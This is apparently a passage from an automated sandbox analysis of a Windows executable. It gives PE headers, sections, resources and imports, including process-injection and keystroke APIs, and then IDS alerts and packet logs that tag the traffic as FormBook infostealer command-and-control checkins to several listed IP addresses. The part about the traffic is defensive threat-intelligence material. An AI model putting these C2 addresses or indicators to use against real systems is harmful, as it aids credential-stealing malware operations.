IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
---- | --------------- | ------------ | -------- | --- | -------- | --------------- | --------- | ------- | ---------------
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x62c54 | 0x62e00 | ed536a326b6ebf20e00d30320c5f795d | False | 0.9331320124841972 | data | 7.906365126858876 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x12a000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
---- | --- | ---- | ---- | -------- | ------- | ---------------
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x59f1b | data | | | 1.0003284375330812
RT_GROUP_ICON | 0x1296d4 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x12974c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x129760 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x129774 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x129788 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x129864 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
--- | ------
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
------------------------------ | -------------------------------- | ---
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
--------- | --- | --------- | -------- | --------- | ----------- | ------- | --------- | --------
2024-12-06T10:05:31.408001+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49857 | 38.47.233.21 | 80 | TCP
2024-12-06T10:05:31.408001+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49857 | 38.47.233.21 | 80 | TCP
2024-12-06T10:05:48.268092+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49899 | 104.21.7.187 | 80 | TCP
2024-12-06T10:05:50.924364+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49905 | 104.21.7.187 | 80 | TCP
2024-12-06T10:05:53.580707+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49912 | 104.21.7.187 | 80 | TCP
2024-12-06T10:05:56.367744+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49918 | 104.21.7.187 | 80 | TCP
2024-12-06T10:05:56.367744+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49918 | 104.21.7.187 | 80 | TCP
2024-12-06T10:06:05.092186+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49939 | 206.238.89.119 | 80 | TCP
2024-12-06T10:06:07.740586+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49947 | 206.238.89.119 | 80 | TCP
2024-12-06T10:06:10.393360+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49956 | 206.238.89.119 | 80 | TCP
2024-12-06T10:06:13.136575+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49962 | 206.238.89.119 | 80 | TCP
2024-12-06T10:06:13.136575+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49962 | 206.238.89.119 | 80 | TCP
2024-12-06T10:06:19.912720+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49977 | 66.29.149.46 | 80 | TCP
2024-12-06T10:06:22.579528+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49985 | 66.29.149.46 | 80 | TCP
2024-12-06T10:06:25.230863+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49993 | 66.29.149.46 | 80 | TCP
2024-12-06T10:06:27.894773+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49999 | 66.29.149.46 | 80 | TCP
2024-12-06T10:06:27.894773+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49999 | 66.29.149.46 | 80 | TCP
2024-12-06T10:06:35.015331+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50016 | 217.70.184.50 | 80 | TCP
2024-12-06T10:06:37.684527+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50022 | 217.70.184.50 | 80 | TCP
2024-12-06T10:06:40.442513+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50025 | 217.70.184.50 | 80 | TCP
2024-12-06T10:06:43.025524+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50026 | 217.70.184.50 | 80 | TCP
2024-12-06T10:06:43.025524+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50026 | 217.70.184.50 | 80 | TCP
2024-12-06T10:06:50.722386+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50027 | 13.228.81.39 | 80 | TCP
2024-12-06T10:06:53.394332+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50028 | 13.228.81.39 | 80 | TCP
2024-12-06T10:06:56.050566+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50029 | 13.228.81.39 | 80 | TCP
2024-12-06T10:06:58.786529+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50030 | 13.228.81.39 | 80 | TCP
2024-12-06T10:06:58.786529+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50030 | 13.228.81.39 | 80 | TCP
2024-12-06T10:07:05.771308+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50032 | 199.59.243.227 | 80 | TCP
2024-12-06T10:07:08.427626+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50033 | 199.59.243.227 | 80 | TCP
2024-12-06T10:07:11.088789+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50034 | 199.59.243.227 | 80 | TCP
2024-12-06T10:07:13.738566+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50035 | 199.59.243.227 | 80 | TCP
2024-12-06T10:07:13.738566+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50035 | 199.59.243.227 | 80 | TCP
2024-12-06T10:07:20.894779+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50036 | 172.67.178.93 | 80 | TCP
2024-12-06T10:07:23.551499+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50037 | 172.67.178.93 | 80 | TCP
2024-12-06T10:07:26.207724+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50038 | 172.67.178.93 | 80 | TCP
2024-12-06T10:07:29.655370+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50039 | 172.67.178.93 | 80 | TCP
2024-12-06T10:07:29.655370+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50039 | 172.67.178.93 | 80 | TCP
2024-12-06T10:07:36.229146+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50040 | 172.67.192.207 | 80 | TCP
2024-12-06T10:07:38.894686+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50041 | 172.67.192.207 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
--------- | ----------- | --------- | --------- | -------
Dec 6, 2024 10:05:29.756244898 CET | 49857 | 80 | 192.168.2.6 | 38.47.233.21
Dec 6, 2024 10:05:29.876005888 CET | 80 | 49857 | 38.47.233.21 | 192.168.2.6
Dec 6, 2024 10:05:29.876112938 CET | 49857 | 80 | 192.168.2.6 | 38.47.233.21
Dec 6, 2024 10:05:29.894571066 CET | 49857 | 80 | 192.168.2.6 | 38.47.233.21
Dec 6, 2024 10:05:30.015563011 CET | 80 | 49857 | 38.47.233.21 | 192.168.2.6
Dec 6, 2024 10:05:31.407588959 CET | 80 | 49857 | 38.47.233.21 | 192.168.2.6
Dec 6, 2024 10:05:31.407666922 CET | 80 | 49857 | 38.47.233.21 | 192.168.2.6
Dec 6, 2024 10:05:31.408000946 CET | 49857 | 80 | 192.168.2.6 | 38.47.233.21
Dec 6, 2024 10:05:31.411264896 CET | 49857 | 80 | 192.168.2.6 | 38.47.233.21
Dec 6, 2024 10:05:31.530925989 CET | 80 | 49857 | 38.47.233.21 | 192.168.2.6
Dec 6, 2024 10:05:46.604793072 CET | 49899 | 80 | 192.168.2.6 | 104.21.7.187
Dec 6, 2024 10:05:46.724570036 CET | 80 | 49899 | 104.21.7.187 | 192.168.2.6
Dec 6, 2024 10:05:46.724648952 CET | 49899 | 80 | 192.168.2.6 | 104.21.7.187
Dec 6, 2024 10:05:46.753936052 CET | 49899 | 80 | 192.168.2.6 | 104.21.7.187
Dec 6, 2024 10:05:46.873797894 CET | 80 | 49899 | 104.21.7.187 | 192.168.2.6
Dec 6, 2024 10:05:48.268091917 CET | 49899 | 80 | 192.168.2.6 | 104.21.7.187
Dec 6, 2024 10:05:48.388494015 CET | 80 | 49899 | 104.21.7.187 | 192.168.2.6
Dec 6, 2024 10:05:48.388566971 CET | 49899 | 80 | 192.168.2.6 | 104.21.7.187
Dec 6, 2024 10:05:49.286945105 CET | 49905 | 80 | 192.168.2.6 | 104.21.7.187
Dec 6, 2024 10:05:49.406789064 CET | 80 | 49905 | 104.21.7.187 | 192.168.2.6
Dec 6, 2024 10:05:49.406914949 CET | 49905 | 80 | 192.168.2.6 | 104.21.7.187
Dec 6, 2024 10:05:49.421013117 CET | 49905 | 80 | 192.168.2.6 | 104.21.7.187
Dec 6, 2024 10:05:49.540750980 CET | 80 | 49905 | 104.21.7.187 | 192.168.2.6
Dec 6, 2024 10:05:50.924364090 CET | 49905 | 80 | 192.168.2.6 | 104.21.7.187
Dec 6, 2024 10:05:51.044627905 CET | 80 | 49905 | 104.21.7.187 | 192.168.2.6
Dec 6, 2024 10:05:51.044755936 CET | 49905 | 80 | 192.168.2.6 | 104.21.7.187
Dec 6, 2024 10:05:51.943028927 CET | 49912 | 80 | 192.168.2.6 | 104.21.7.187
Dec 6, 2024 10:05:52.062894106 CET | 80 | 49912 | 104.21.7.187 | 192.168.2.6
Dec 6, 2024 10:05:52.062978983 CET | 49912 | 80 | 192.168.2.6 | 104.21.7.187
Dec 6, 2024 10:05:52.076924086 CET | 49912 | 80 | 192.168.2.6 | 104.21.7.187
Dec 6, 2024 10:05:52.196849108 CET | 80 | 49912 | 104.21.7.187 | 192.168.2.6
Dec 6, 2024 10:05:52.196863890 CET | 80 | 49912 | 104.21.7.187 | 192.168.2.6
Dec 6, 2024 10:05:53.580707073 CET | 49912 | 80 | 192.168.2.6 | 104.21.7.187
Dec 6, 2024 10:05:53.700948000 CET | 80 | 49912 | 104.21.7.187 | 192.168.2.6
Dec 6, 2024 10:05:53.701049089 CET | 49912 | 80 | 192.168.2.6 | 104.21.7.187
Dec 6, 2024 10:05:54.599297047 CET | 49918 | 80 | 192.168.2.6 | 104.21.7.187
Dec 6, 2024 10:05:54.719050884 CET | 80 | 49918 | 104.21.7.187 | 192.168.2.6
Dec 6, 2024 10:05:54.719136953 CET | 49918 | 80 | 192.168.2.6 | 104.21.7.187
Dec 6, 2024 10:05:54.727844000 CET | 49918 | 80 | 192.168.2.6 | 104.21.7.187
Dec 6, 2024 10:05:54.847516060 CET | 80 | 49918 | 104.21.7.187 | 192.168.2.6
Dec 6, 2024 10:05:56.367559910 CET | 80 | 49918 | 104.21.7.187 | 192.168.2.6
Dec 6, 2024 10:05:56.367640018 CET | 80 | 49918 | 104.21.7.187 | 192.168.2.6
                                                                    Dec 6, 2024 10:05:56.367743969 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:56.905147076 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.905164003 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.905184984 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.905195951 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.905214071 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.905225992 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.905239105 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.905360937 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.905373096 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:56.905373096 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:56.905543089 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:56.913495064 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.913819075 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.914052010 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:56.927419901 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.927438974 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.927571058 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.025602102 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.026359081 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.026465893 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.029604912 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.080708027 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.097481012 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.097543955 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.097655058 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.099462986 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.099802017 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.099843025 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.107832909 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.108108044 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.108163118 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.116338968 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.116986036 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.117259979 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.124406099 CET8049918104.21.7.187192.168.2.6
